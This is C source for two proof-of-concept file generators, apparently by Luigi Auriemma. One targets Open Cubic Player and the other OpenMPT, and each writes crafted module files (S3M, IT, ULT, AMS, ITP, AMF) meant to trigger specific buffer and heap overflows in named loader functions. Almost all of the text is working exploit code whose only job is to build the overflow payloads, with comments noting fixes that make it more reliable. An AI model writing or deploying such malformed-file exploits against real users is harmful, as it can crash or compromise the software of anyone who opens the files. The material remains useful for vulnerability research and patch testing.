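/*
 * Entry point of the Open Cubic Player test-file generator.
 *
 * argv[1] selects one of the four malformed module layouts listed in the
 * usage text, argv[2] is the output path.  The selected layout is written
 * with the fw*() helpers and the s3m_t / it_t / ams_t header structs that
 * are declared elsewhere in this file.
 *
 * Fixes over the previous revision: the attack number is parsed with
 * strtol() and validated BEFORE the output file is created (the old code
 * created an empty file and exited 0 on a bad number), and the results of
 * fwrite()/fputc()/fclose() are checked so a short or failed write cannot
 * silently produce a truncated file.
 *
 * Returns 0 once the file has been written; exits with status 1 on bad
 * arguments and through std_err() on any I/O failure.
 */
int main(int argc, char *argv[]) {
    FILE    *fd;
    s3m_t   s3m;
    it_t    it;
    ams_t   ams;
    int     i,
            j,
            tmp,
            attack;
    long    attack_l;
    char    *end;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web: aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <output_file>\n"
            "\n"
            "Attacks:\n"
            " 1 = buffer-overflow in mpLoadS3M (*.S3M)\n"
            " 2 = buffer-overflow in itload.cpp (*.IT)\n"
            " 3 = buffer-overflow in mpLoadULT (*.ULT)\n"
            " 4 = buffer-overflow (envs) in mpLoadAMS (*.AMS)\n"
            "\n", argv[0]);
        exit(1);
    }

    // strtol() instead of atoi(): junk, empty or out-of-range input is
    // reported instead of being silently mapped to 0.  Validate before
    // fopen() so a bad number does not leave an empty output file behind.
    errno    = 0;
    attack_l = strtol(argv[1], &end, 10);
    if(end == argv[1] || *end != '\0' || errno == ERANGE || attack_l < 1 || attack_l > 4) {
        printf("\nError: you must specify the right attack number\n");
        exit(1);
    }
    attack = (int)attack_l;
    fname  = argv[2];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    if(attack == 1) {
        // S3M header followed by an order table whose length is taken
        // straight from the header's ordnum field.
        memset(&s3m, 0, sizeof(s3m));
        strncpy(s3m.name, POCNAME, sizeof(s3m.name));   // fixed-width field, no terminator needed
        s3m.kennung = 0x1a;
        s3m.typ     = 16;
        s3m.ordnum  = 800;
        memcpy(s3m.scrm, "SCRM", 4);
        if(fwrite(&s3m, sizeof(s3m), 1, fd) != 1) std_err();
        for(i = 0; i < s3m.ordnum - 1; i++) {
            if(fputc('a', fd) == EOF) std_err();
        }
        if(fputc(0, fd) == EOF) std_err();  // for forcing "return errFormMiss"

    } else if(attack == 2) {
        // IT header whose count fields (OrdNum, and optionally InsNum)
        // are larger than the loader's fixed-size tables.
        memset(&it, 0, sizeof(it));
        memcpy(it.sign, "IMPM", 4);
        strncpy(it.name, POCNAME, sizeof(it.name));     // fixed-width field, no terminator needed
        it.Cmwt   = 0x200;
        it.OrdNum = 1000;   // buffer-overflow
        // it.InsNum = 200; // buffer-overflow
        if(fwrite(&it, sizeof(it), 1, fd) != 1) std_err();
        for(i = 0; i < 64; i++) fwi08(fd, 0);
        for(i = 0; i < 64; i++) fwi08(fd, 0);
        for(i = 0; i < it.OrdNum; i++) fwi08(fd, 'a');
        // InsNum/SmpNum/PatNum are still 0 from the memset, so the three
        // loops below write nothing unless the commented line is enabled.
        for(i = 0; i < it.InsNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.SmpNum; i++) fwi32(fd, 'a');
        for(i = 0; i < it.PatNum; i++) fwi32(fd, 'a');

    } else if(attack == 3) {
        // ULT file: the channel count byte (chnn) drives the size of the
        // per-channel block that follows.
        fwmem(fd, "MAS_UTrack_V00", 14);
        fwi08(fd, 3 + '1');
        fwstx(fd, POCNAME, 32);
        fwi08(fd, 0);           // msglen
        fwi08(fd, 0);           // insnum
        fwbof(fd, 256, 0);      // orders
        tmp = 0x7f;
        fwi08(fd, tmp);         // chnn
        fwi08(fd, 0);           // patn
        fwbof(fd, tmp, 'a');    // buffer-overflow
        // possible heap overflow with chbp, patlength = 0

    } else if(attack == 4) {
        // AMS file with one instrument whose three envelopes each declare
        // 0xff points.
        fwmem(fd, "AMShdr\x1A", 7);     // sig
        fwi08(fd, AMSNAMELEN);          // sig[7]
        fwbof(fd, AMSNAMELEN, 'a');     // name
        fwi16(fd, 0x202);               // filever
        memset(&ams, 0, sizeof(ams));
        ams.ins = 1;
        if(fwrite(&ams, sizeof(ams), 1, fd) != 1) std_err();
        for(j = 0; j < ams.ins; j++) {
            fwi08(fd, AMSNAMELEN);          // namelen
            fwbof(fd, AMSNAMELEN, 'a');     // name
            fwi08(fd, 1);                   // smpnum
            fwbof(fd, 120, 0);              // samptab
            for(i = 0; i < 3; i++) {        // envs
                tmp = 0xff;
                fwi08(fd, 0);       // speed
                fwi08(fd, 0);       // sustain
                fwi08(fd, 0);       // loopstart
                fwi08(fd, 0);       // loopend
                fwi08(fd, tmp);     // points
                fwbof(fd, tmp * 3, 'a');    // 3 bytes per declared point
            }
        }
    }

    // fclose() flushes the stdio buffer; a failure here means the file on
    // disk is incomplete, so treat it like any other write error.
    if(fclose(fd) != 0) std_err();
    printf("- finished\n");
    return(0);
}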
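/*
 * Entry point of the OpenMPT test-file generator.
 *
 * argv[1] selects one of the two malformed file layouts listed in the
 * usage text, argv[2] is the output path.  The selected layout is written
 * with the fw*() helpers and the amf_head_t / amf_smp_t structs that are
 * declared elsewhere in this file.
 *
 * Fixes over the previous revision: the argument check was `argc < 2`
 * although argv[2] is dereferenced below, so running with a single
 * argument passed NULL to fopen(); the attack number is now parsed with
 * strtol() and validated before the file is created (an unknown number
 * used to produce an empty file and exit 0); sprintf() into the sample
 * name field is bounded with snprintf(); fwrite()/fclose() results are
 * checked.
 *
 * Returns 0 once the file has been written; exits with status 1 on bad
 * arguments and through std_err() on any I/O failure.
 */
int main(int argc, char *argv[]) {
    amf_head_t  amf_head;
    amf_smp_t   amf_smp;
    FILE    *fd;
    int     i,
            attack;
    long    attack_l;
    char    *end;
    char    *fname;

    setbuf(stdout, NULL);

    fputs("\n"
        "OpenMPT <= 1.17.02.43 and SVN <= 157 stack and heap overflows "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: [email protected]\n"
        "web: aluigi.org\n"
        "\n", stdout);

    // Both argv[1] and argv[2] are used, so three arguments are required.
    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <output_file>\n"
            "\n"
            "Attacks:\n"
            " 1 = various global buffer overflows in ReadITProject (*.ITP)\n"
            " 2 = heap overflow in ReadSample (*.AMF)\n"
            "\n", argv[0]);
        exit(1);
    }

    // strtol() instead of atoi(): junk, empty or out-of-range input is
    // reported instead of being silently mapped to 0.  Validate before
    // fopen() so a bad number does not leave an empty output file behind.
    errno    = 0;
    attack_l = strtol(argv[1], &end, 10);
    if(end == argv[1] || *end != '\0' || errno == ERANGE || attack_l < 1 || attack_l > 2) {
        printf("\nError: you must specify the right attack number\n");
        exit(1);
    }
    attack = (int)attack_l;
    fname  = argv[2];

    printf("- create file %s\n", fname);
    fd = fopen(fname, "wb");
    if(!fd) std_err();

    if(attack == 1) {
        // ITP header: every length/count field is a 32-bit value the
        // reader trusts; only the song name length is oversized here,
        // everything after it is zero so the reader stops early.
        fwi32(fd, 0x2e697470);          // .itp
        fwi32(fd, 0x00000000);          // version
        fwi32(fd, ITPHEAPOVERSZ);       // song name len
        fwbof(fd, ITPHEAPOVERSZ, 'a');  // song name
        fwi32(fd, 0);                   // comments len
        fwi32(fd, SONG_ITPROJECT);      // m_dwSongFlags
        fwi32(fd, 128);                 // m_nDefaultGlobalVolume
        fwi32(fd, 0);                   // m_nSongPreAmp
        fwi32(fd, 0);                   // m_nDefaultSpeed
        fwi32(fd, 0);                   // m_nDefaultTempo
        fwi32(fd, 0);                   // m_nChannels
        fwi32(fd, 0);                   // channel name len
        // for(i=0; i<m_nChannels; i++){
        fwi32(fd, 0);                   // LoadMixPlugins len
        fwi32(fd, 0);                   // m_MidiCfg len
        fwi32(fd, 0);                   // m_nInstruments
        fwi32(fd, 0);                   // path instruments len
        fwi32(fd, 0);                   // order len
        fwi32(fd, 0);                   // number of patterns
        fwi32(fd, 0);                   // m_nPatternNames
        fwi32(fd, 0);                   // m_lpszPatternNames len
        fwi32(fd, 0);                   // modcommand data length
        fwi32(fd, 0);                   // m_nSamples
        fwi32(fd, 0);                   // Read number of embeded samples

    } else if(attack == 2) {
        // ASYLUM AMF: 64 sample headers whose length field is negative,
        // followed by the pattern area and the sample data.
        memset(&amf_head, 0, sizeof(amf_head));
        memset(&amf_smp,  0, sizeof(amf_smp));
        strcpy(amf_head.sign, "ASYLUM Music Format V1.0");
        amf_head.patterns = 1;
        amf_head.orders   = 1;
        if(fwrite(&amf_head, sizeof(amf_head), 1, fd) != 1) std_err();
        for(i = 0; i < 64; i++) {
            // bounded: the name is a fixed-size field inside amf_smp
            snprintf(amf_smp.name, sizeof(amf_smp.name), "sample %d", i);
            amf_smp.finetune = 0;
            amf_smp.volume   = 64;
            amf_smp.length   = ((0 - 6) - 39) + 16;   // ReadSample and AllocateSample
            amf_smp.reppos   = 0;
            amf_smp.replen   = 0;
            if(fwrite(&amf_smp, sizeof(amf_smp), 1, fd) != 1) std_err();
        }
        fwbof(fd, 64 * 32, 0x00);
        fwbof(fd, ALLOCSAMPLESZ + HEAPOVERSZ, 'a');
    }

    // fclose() flushes the stdio buffer; a failure here means the file on
    // disk is incomplete, so treat it like any other write error.
    if(fclose(fd) != 0) std_err();
    printf("- finished\n");
    return(0);
}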